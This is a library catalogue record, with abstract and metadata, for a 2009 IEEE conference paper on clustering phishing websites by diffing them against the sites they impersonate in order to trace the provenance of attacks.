• DocumentCode
    2298327
  • Title

    Using Differencing to Increase Distinctiveness for Phishing Website Clustering

  • Author

    Layton, Robert ; Brown, Simon ; Watters, Paul

  • Author_Institution
    Internet Commerce Security Lab., Univ. of Ballarat, Ballarat, VIC, Australia
  • fYear
    2009
  • fDate
    7-9 July 2009
  • Firstpage
    488
  • Lastpage
    492
  • Abstract
    Phishing Web pages present a previously underused resource for information on determining provenance of phishing attacks. Phishing Web pages aim to impersonate a legitimate Web site in order to trick their potential victims into revealing their confidential data, such as usernames and passwords. However different phishing Web pages often contain small differences and these differences can provide a great deal of evidence on the provenance of phishing attacks. When impersonating a Web page, there is often a large amount of ´redundant´ information, as much of the original, impersonated Web site is found in phishing Web sites, making phishing Web sites across different attacks very similar. In order to attempt to overcome this issue, a diff can be used which takes the phishing and original Web sites as input and returns the differences between the two.These differences present a new view on the data that is previously unused and presents a novel way to increase the ability of clustering algorithms to find good, distinct and separated clusters within the data. The research presented here outlines this diff process and shows that for the data used, comparable results were obtained while the dimensionality of the dataset was reduced. This reduction in size allows for clustering algorithms to complete faster, due to the reduced dimensionality of the dataset.
  • Keywords
    Web sites; computer crime; impersonated Web site; phishing Web pages; phishing Web site clustering; phishing attacks; Australia; Business; Clustering algorithms; Computer crime; Conferences; Electronic mail; HTML; Information security; Internet; Laboratories; Phishing; conceptual analysis; diff;
  • fLanguage
    English
  • Publisher
    ieee
  • Conference_Titel
    Ubiquitous, Autonomic and Trusted Computing, 2009. UIC-ATC '09. Symposia and Workshops on
  • Conference_Location
    Brisbane, QLD
  • Print_ISBN
    978-1-4244-4902-6
  • Electronic_ISBN
    978-0-7695-3737-5
  • Type

    conf

  • DOI
    10.1109/UIC-ATC.2009.62
  • Filename
    5319187